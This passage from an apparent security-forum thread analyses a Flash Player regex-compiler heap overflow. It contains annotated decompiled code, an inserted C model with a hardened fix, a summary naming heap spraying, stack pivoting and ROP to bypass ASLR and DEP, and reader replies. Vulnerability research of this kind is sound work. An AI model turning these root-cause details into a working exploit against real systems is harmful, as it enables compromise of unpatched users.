    if ( a7 )
      *(_DWORD *)(v15 + 48) = v52;
    v21 = a1;
    if ( (a1 & 7) != a2 )
    {
      *(_BYTE *)v19 = 0x18u;
      v22 = v19 + 1;
      *(_BYTE *)v22 = v21 & 7;                  // 2 more bytes written here: 0x18 plus the option byte
      v19 = v22 + 1;
      v44 += 2;
      a11 = v19;                                // pointer advances by 2: '|' was counted as 3 bytes in the length pass, but 5 bytes get written
    }
    if ( a6 )
    {
      *(_BYTE *)v19 = 91;
      v23 = v19 + 1;
      *(_BYTE *)v23 = 0;
      *(_BYTE *)(v23 + 1) = 0;
      v51 = v23;
      v44 += 3;
      a11 = v23 + 2;
    }
    if ( !sub_10525D90(a5, (int)&a2a, (int)&a1, (int)&a11, (int)&v45, (int)&a6a, (int)&a7a, v15, v20) )// recursive (nested groups)
      goto LABEL_34;
    if ( *(_DWORD *)(v15 + 48) > v49 )
      v49 = *(_DWORD *)(v15 + 48);
    if ( a13 )
      goto LABEL_29;
    if ( *(_BYTE *)v13 != 0x53 )
    {
      v18 = a6a;
      v47 = a2a;
      goto LABEL_26;
    }
    if ( v47 >= 0 )
    {
      if ( v47 == a2a )
        goto LABEL_22;
      if ( v18 < 0 )
        v18 = v47;
      v47 = -1;
    }
    if ( a2a >= 0 )
    {
      v24 = a6a;
      if ( a6a < 0 )
      {
        v24 = a2a;
        a6a = a2a;
      }
      goto LABEL_23;
    }
LABEL_22:
    v24 = a6a;
LABEL_23:
    v18 = (v18 ^ v24) & 0xFFFFFDFF ? -1 : v24 | v18;
LABEL_26:
    if ( a6 )
    {
      *(_BYTE *)a11 = 0;
      v25 = sub_10529490(v13);
      if ( v25 < 0 )
      {
        *(_DWORD *)a5 = v25 != -2 ? 25 : 36;
LABEL_34:
        *pszRegExp = v45;
        return 0;
      }
      v26 = v51;
      v13 = v48;
      *(_BYTE *)v51 = BYTE1(v25);
      *(_BYTE *)(v26 + 1) = v25;
    }
LABEL_29:
    v27 = v45;
    if ( *v45 != ('|') )
      break;
    if ( a13 )
    {
      v28 = *a3;
      v44 += 3;                                 // each '|' adds 3 to the length; the (?i)()()(?-i) part measured earlier is 0x18, and with 22 '|' the total is 0x18 + 22*3 = 0x5A
      v19 = v28 + a8 + 3;
      ++v45;
      v15 = a12;
      a11 = v28 + a8 + 3;
    }
    else
    {
      v29 = a11;
      v30 = a11 - v13;
      *(_BYTE *)a11 = 0x53u;
      *(_BYTE *)(v29 + 1) = HIBYTE(v30);
      *(_BYTE *)(v29 + 2) = v29 - v13;          // on '|' write 3 bytes: 0x53 plus a 2-byte offset
      v48 = v29;
      v13 = v29;
      v55 = v29;
      v19 = v29 + 3;
      v45 = v27 + 1;
      v15 = a12;
      a11 = v19;                                // pointer advances by 3
    }
  }
  v32 = a13;
  v33 = a11;
  if ( !a13 )
  {
    v34 = a11 - v13;
    do
    {
      v35 = *(_BYTE *)(v13 + 2) | (*(_BYTE *)(v13 + 1) << 8);
      *(_BYTE *)(v13 + 2) = v34;
      *(_BYTE *)(v13 + 1) = HIBYTE(v34);
      v13 -= v35;
      v34 = v35;
    }
    while ( v35 > 0 );
    v32 = a13;
  }
  v36 = v53;
  v37 = (v33 - v53) >> 8;
  *(_BYTE *)v33 = 84;
  *(_BYTE *)(v33 + 1) = v37;
  LOBYTE(v37) = v33 - v36;
  v38 = a1;
  *(_BYTE *)(v33 + 2) = v37;
  v39 = a2;
  v40 = v33 + 3;
  if ( (v38 & 7) == a2 || *v27 != 41 )
  {
    v42 = v44;
  }
  else
  {
    *(_BYTE *)v40 = 24;
    v41 = v40 + 1;
    *(_BYTE *)v41 = v39;
    v40 = v41 + 1;
    v42 = v44 + 2;
  }
  *(_DWORD *)(a12 + 48) = v49;
  *a3 = v40;
  v43 = a9;
  *pszRegExp = v27;
  *(_DWORD *)v43 = v47;
  *(_DWORD *)a10 = v18;
  if ( v32 )
  {
    if ( 0x7FFFFFEB - *(_DWORD *)v32 < v42 )
    {
      *(_DWORD *)a5 = 20;
      return 0;
    }
    *(_DWORD *)v32 += v42;                      // 1+0x5A=0x5B
  }
  return 1;
}
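As an added example (not the page's, Adobe's or PCRE's code), the following C model reproduces the accounting mismatch the comments in the two functions above describe: the length pass charges 3 bytes per '|' (0x53 plus a 2-byte offset), while the fill pass also writes 0x18 plus an option byte in front of every branch whose ims bits differ from the group's starting bits, 5 bytes per '|'. The 0x18-byte size of the (?i)()()(?-i) prefix, the opcode values, the initial a13 of 1 and the caller's +2 are taken from the decompile; the 40-byte header is left out, the branch contents are constructed filler, the IMS_START/IMS_AFTER_FIRST values are assumptions, and why the two passes see different option state is taken as given from the page rather than modeled. The hardened variant drives both passes through one emitter and bounds-checks each write, instead of the post hoc `v29 + 1 - v26 > a13` test in sub_10529FB0, which only runs after the bytes have already been written.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

#define OP_OPT 0x18            /* option-change opcode (the 0x18 above), followed by one ims byte */
#define OP_ALT 0x53            /* the '|' opcode (the 0x53 above), followed by a 2-byte offset */
#define IMS_MASK 7             /* the (options & 7) bits compared in the decompile */
#define FIRST_BRANCH_LEN 0x18  /* the page's figure for "(?i)()()(?-i)" */
#define IMS_START 1            /* assumption: (?i) at the very start is the group's starting ims */
#define IMS_AFTER_FIRST 0      /* assumption: the top-level (?-i) clears it for the later branches */

typedef struct {
    uint8_t *buf;   /* NULL: measure only */
    size_t cap;     /* bytes available in buf */
    size_t len;     /* bytes the pass wanted to write */
    int overflow;   /* a write would have passed cap; the model refuses it instead of corrupting */
} code_out;

typedef struct { size_t measured; size_t written; int overflow; } result;

static void put(code_out *o, uint8_t b)
{
    if (o->buf) {
        if (o->len < o->cap) o->buf[o->len] = b;
        else o->overflow = 1;
    }
    o->len++;
}

/* The byte stream the fill pass produces for "(?i)()()(?-i)" followed by n_alts '|'.
 * Every branch after the first sees ims != starting ims, so it gets OP_OPT plus
 * the option byte in front of its OP_ALT: 5 bytes per '|' instead of 3. */
static void emit_alternation(code_out *o, int n_alts)
{
    uint8_t ims = IMS_START;
    for (int b = 0; b <= n_alts; b++) {
        if ((ims & IMS_MASK) != (IMS_START & IMS_MASK)) {   /* the (a1 & 7) != a2 test */
            put(o, OP_OPT);
            put(o, ims & IMS_MASK);
        }
        if (b == 0) {
            for (size_t i = 0; i < FIRST_BRANCH_LEN; i++) put(o, 0);   /* constructed filler for the first branch */
            ims = IMS_AFTER_FIRST;
        }
        if (b < n_alts) { put(o, OP_ALT); put(o, 0); put(o, 0); }
    }
    put(o, 0);   /* the terminating byte stored after the last branch */
}

/* Vulnerable length pass, as the page's accounting has it: a13 starts at 1,
 * the first branch adds 0x18, and each '|' adds only 3. */
static size_t vuln_measure(int n_alts)
{
    return 1 + FIRST_BRANCH_LEN + 3 * (size_t)n_alts;
}

/* Vulnerable flow: size from the separate formula (+2, as the caller adds),
 * then the fill pass, which wants 2 more bytes per '|' than was allocated. */
result vuln_compile(int n_alts)
{
    result r = { vuln_measure(n_alts), 0, 0 };
    size_t cap = r.measured + 2;
    code_out o = { malloc(cap), cap, 0, 0 };
    if (!o.buf) { r.overflow = -1; return r; }
    emit_alternation(&o, n_alts);
    r.written = o.len;
    r.overflow = o.overflow;
    free(o.buf);
    return r;
}

/* Hardened flow: the same emitter runs twice, first with buf == NULL to
 * measure and then to fill, so the two passes cannot disagree, and every
 * write is bounds-checked rather than trusting the estimate. */
result safe_compile(int n_alts)
{
    code_out m = { NULL, 0, 0, 0 };
    emit_alternation(&m, n_alts);
    result r = { m.len, 0, 0 };
    code_out o = { malloc(m.len), m.len, 0, 0 };
    if (!o.buf) { r.overflow = -1; return r; }
    emit_alternation(&o, n_alts);
    r.written = o.len;
    r.overflow = o.overflow;
    free(o.buf);
    return r;
}

int main(void)
{
    result v = vuln_compile(22), s = safe_compile(22);
    printf("vulnerable: measured 0x%zx, allocated 0x%zx, fill wanted 0x%zx, overflow=%d\n",
           v.measured, v.measured + 2, v.written, v.overflow);
    printf("hardened:   measured 0x%zx, fill wrote 0x%zx, overflow=%d\n",
           s.measured, s.written, s.overflow);
    return 0;
}
```

With 22 alternatives the vulnerable flow measures 0x5B, allocates 0x5D and wants to write 0x87, the 2-byte-per-'|' excess the comments above describe; the hardened flow measures and writes the same 0x87. The point of the fix is structural: once the size estimate and the writer are one code path, no later change to what a branch emits can reopen the gap, and the in-line bounds check turns any remaining miscount into a refused write instead of a heap overflow.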

4. Summary
This POC uses hard-coded addresses, address arithmetic and heap spraying, combined with a stack pivot and ROP, to bypass ASLR+DEP. It is fairly involved, though it is a little disappointing that the payload is not encrypted.
5. References
http://www.adobe.com/support/security/bulletins/apsb13-04.html
http://bbs.kafan.cn/thread-1466244-1-1.html

Replies (22)

xkjcf 2013-2-12 03:57
Saving this for now, will study it later~

dEARMoON 2013-2-12 10:24
a2 and v9 being controllable leads to an arbitrary-address QWORD write that overwrites some object's vtable pointer

That sentence was really hard to find.

promsied 2013-2-12 12:04
It was written in a hurry; I have corrected it.
I think this vulnerability should be classed as Memory Corruption, so it should be CVE-2013-0634.

promsied 2013-2-13 12:56
Smashing the Heap with Vector:
Advanced Exploitation Technique in Recent Flash Zero-day Attack
Haifei Li's paper is out.
The analysis is finally complete.

darkplayer 2013-2-13 13:18
mark!!!!!!!!

wingdbg 2013-2-13 15:36
Does it not work under Office 2003 and Office 2007?

promsied 2013-2-13 15:56
It shouldn't have anything to do with Office.

wingdbg 2013-2-14 09:06
Couldn't trigger it. The Flash version is right, but it didn't work under either Office 2003 or Office 2007...

南宫世家 2013-2-14 09:41
Good stuff, learning...

AJISky 2013-2-15 21:45
Bump. I've been looking at bug hunting lately too; is this a first publication?

AJISky 2013-2-15 21:47
Bump. I've been reading books on this lately; did you find this bug yourself?

寂寞如刀 2013-2-16 14:46
Finding this bug is incredible.

Looks like AS is about to be stripped bare.

pende 2013-2-18 11:20
Nice analysis, learning from it.

仙果 2013-2-18 16:39
They all work; test again more carefully.

cscoder 2013-2-19 16:51
Heap overflow. The overflow location the OP found seems... seems wrong :)

.text:105299B2                 mov     byte ptr [eax], 53h

cscoder 2013-2-19 16:51
If you only want to analyze the root cause, compiling the attachment with the Flex SDK to produce the SWF is enough.

promsied 2013-2-19 17:21
[QUOTE=cscoder;1144280]Heap overflow. The overflow location the OP found seems... seems wrong :)

.text:105299B2                 mov     byte ptr [eax], 53h[/QUOTE]

That is the location where the Double gets written into the Vector. I did not analyze the regex part, only the exploitation; I will fill it in when I have time.

promsied 2013-2-21 15:52
[QUOTE=cscoder;1144280]Heap overflow. The overflow location the OP found seems... seems wrong :)

.text:105299B2                 mov     byte ptr [eax], 53h[/QUOTE]

Filled in, dear.

king少 2013-2-25 17:28
Nothing triggered...

范小贩 2013-3-13 10:29
I can't follow the analysis; I can't find where the shellcode is.

病武松 2013-3-14 09:27
Looking for the Flash environment.

范小贩 2013-3-14 17:34
Mine didn't work either, frustrating.